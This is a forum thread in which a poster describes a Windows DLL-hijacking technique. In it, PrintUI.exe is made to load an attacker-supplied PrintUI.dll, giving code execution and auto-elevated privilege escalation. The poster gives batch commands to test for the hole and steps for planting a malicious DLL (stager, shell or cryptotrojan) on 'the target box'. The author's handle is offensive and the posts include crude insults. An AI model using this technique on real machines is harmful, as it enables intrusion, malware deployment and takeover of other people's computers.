User Controls

Arbitrary code execution.

  1. #1
    Sophie Pedophile Tech Support
    Sorry for the vague title but if i make it overly technical people's eyes will just glaze over and click on another thread instead. Anyway i currently can't access any of my Windows VMs because my server was having some technical difficulties, which are being worked on.

    Anyway i was wondering whether PrintUI.exe still loads an arbitrary PrintUI.dll from %ProgramData% or it's immediate path instead of the system directory on wanblows. Obviously at the enterprise level this will be well taken care of but your average user doesn't know how incompetent Micrococks is.

    If it has been fixed in recent updates that's fine but a year ago this was still a great vector not only for arbitrary code execution but privilege escalation as well. Micro$oft has been aware of this since 2014.

    To test run:


    COPY "%SystemRoot%\System32\ShUnimpl.dll" "%ProgramData%\PrintUI.dll"
    RENAME "%ProgramData%\WRITABLE.LOG" PrintUI.exe
    START "" /WAIT "%ProgramData%\PrintUI.exe"
    CERTUTIL.exe /ERROR %ERRORLEVEL%


    If the new PrintUI works as intended you have a problem. ShUnimpl.dll is supposed to get rid of obsolete shell functions, by letting them error out properly and prevent any shenanigans. PrintUI.exe does not comply with this though, and if/when it doesn't write a stager, shell, or cryptotrojan or anything you can think of really. Compile it for windows as DLL, and get it to "C:\Windows\System32\Tasks_Migrated\PrintUI.dll".

    Now on the target box copy PrintUI.exe from %ProgramData% to the directory specified above and run it. It's going to load your malicious DLL, auto elevate it to admin and run your code. That's a game over for the box in question.
  2. #2
    Sophie Pedophile Tech Support
    No answers huh, i guess all i can conclude is that i am a level 97 Cyber Security wizard and no one is even close to my level and therefore has nothing to contribute. Which is kind of unfortunate.
Jump to Top